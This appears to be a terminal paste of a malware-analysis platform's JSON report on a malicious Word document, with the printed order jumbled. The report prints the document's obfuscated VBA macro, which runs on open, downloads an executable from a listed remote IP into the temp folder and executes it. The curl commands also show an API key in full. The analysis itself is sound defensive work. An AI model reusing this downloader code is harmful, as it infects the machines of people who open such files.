ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = HlFdNIYK + 1\r\nLoop\r\n\r\n pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
"analysis": {
"VBA String": [],
"Dridex String": [],
"Suspicious": [
[
"Hex Strings",
"Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
],
[
"Chr",
"May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
],
[
"StrReverse",
"May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
],
[
"Shell",
"May run an executable file or a system command"
],
[
"Environ",
"May read system environment variables"
],
[
"URLDownloadToFileA",
"May download files from the Internet"
],
[
"Lib",
"May run code from a DLL"
]
],
"Hex String": [
[
"\\vGJsdfbJHKdsf.exe",
"5C76474A736466624A484B6473662E657865"
],
[
"TEMP",
"54454D50"
]
],
"Form String": [],
"Base64 String": [],
"AutoExec": [
[
"Workbook_Open",
"Runs when the Excel Workbook is opened"
],
[
"AutoOpen",
"Runs when the Word document is opened"
]
],
"IOC": [
[
"94.136.57.72",
"IPv4 address (obfuscation: StrReverse+Hex)"
],
[
"vGJsdfbJHKdsf.exe",
"Executable file name (obfuscation: Hex)"
],
[
"http://94.136.57.72:8080/mopsi/popsi.php",
"URL (obfuscation: StrReverse+Hex)"
]
]
}
}
},
"module": null,
"date": {
"$date": 1490354278607
},
"file": {
"owners": [
"cert",
"*"
],
"sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
"names": [
"DEC2248QO.doc"
],
"probable_names": [],
"parent_analyses": [],
"antivirus": {},
"sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
"detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
"mime": "application/msword",
"analysis": [
{
"$oid": "58d4f256014ed28a5d50c113"
}
],
"groups": [
"cert",
"*"
],
"_id": {
"$oid": "58d4f256014ed28a5d50c112"
},
"type": "word",
"md5": "757e9b7209f0d6ef3cf7bfd904445009"
},
"iocs": [],
"executed_modules": [
"office_macros"
],
"probable_names": [],
"extracted_files": [],
"status": "finished",
"tags": [
"office_macros"
],
"groups": [
"cert",
"*"
],
"pending_modules": [],
"analyst": {
"$oid": "58d4e81b014ed25aaa77fabf"
},
"waiting_modules": [],
"canceled_modules": [],
"threat_intelligence": {},
"generated_files": {},
"_id": {
"$oid": "58d4f256014ed28a5d50c113"
},
"options": {}
}
}
circl@cpg:~/build/fame$ curl -X GET -H "Content-type: application/json" -H "Accept: application/json" -H "X-API-KEY: 8b1958858cdaf80ac55e17a26eca3cc2dd17ab2a88b0ab5ee646cdce20d966441aa55fbfbad45d62" http://localhost:4200/analyses/58d4f256014ed28a5d50c113|jq|pbcopy
jq - commandline JSON processor [version 1.5-1-a5b5cbe]
Usage: jq [options] <jq filter> [file...]
jq is a tool for processing JSON inputs, applying the
given filter to its JSON text inputs and producing the
filter's results as JSON on standard output.
The simplest filter is ., which is the identity filter,
copying jq's input to its output unmodified (except for
formatting).
For more advanced filters see the jq(1) manpage ("man jq")
and/or https://stedolan.github.io/jq
Some of the options include:
-c compact instead of pretty-printed output;
-n use `null` as the single input value;
-e set the exit status code based on the output;
-s read (slurp) all inputs into an array; apply filter to it;
-r output raw strings, not JSON texts;
-R read raw strings, not JSON texts;
-C colorize JSON;
-M monochrome (don't colorize JSON);
-S sort keys of objects on output;
--tab use tabs for indentation;
--arg a v set variable $a to value <v>;
--argjson a v set variable $a to JSON value <v>;
--slurpfile a f set variable $a to an array of JSON texts read from <f>;
See the manpage for more options.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
64 25677 64 16384 0 0 1190k 0 --:--:-- --:--:-- --:--:-- 1230k
curl: (23) Failed writing body (0 != 16384)
No command 'pbcopy' found, did you mean:
Command 'bcopy' from package 'bacula-sd-sqlite3' (universe)
Command 'bcopy' from package 'bacula-sd-pgsql' (universe)
Command 'bcopy' from package 'bacula-sd-mysql' (universe)
Command 'bcopy' from package 'bareos-tools' (universe)
pbcopy: command not found
circl@cpg:~/build/fame$ curl -X GET -H "Content-type: application/json" -H "Accept: application/json" -H "X-API-KEY: 8b1958858cdaf80ac55e17a26eca3cc2dd17ab2a88b0ab5ee646cdce20d966441aa55fbfbad45d62" http://localhost:4200/analyses/58d4f256014ed28a5d50c113|jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 25677 100 25677 0 0 2187k 0 --:--:-- --:--:-- --:--:-- 2279k
{
"analysis": {
"support_files": {},
"logs": [
"2017-03-24 11:17: debug: Trying to queue module 'apk'",
"2017-03-24 11:17: debug: Trying to queue module 'eml'",
"2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
"2017-03-24 11:17: debug: Trying to queue module 'pdf'",
"2017-03-24 11:17: debug: Trying to queue module 'zip'",
"2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
"2017-03-24 11:17: debug: Trying to run office_macros",
"2017-03-24 11:17: debug: Done with office_macros"
],
"extractions": [],
"results": {
"office_macros": {
"macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n ByVal szURL As String, _\r\n ByVal szFileName As String, _\r\n ByVal dwReserved As Long, _\r\n ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim 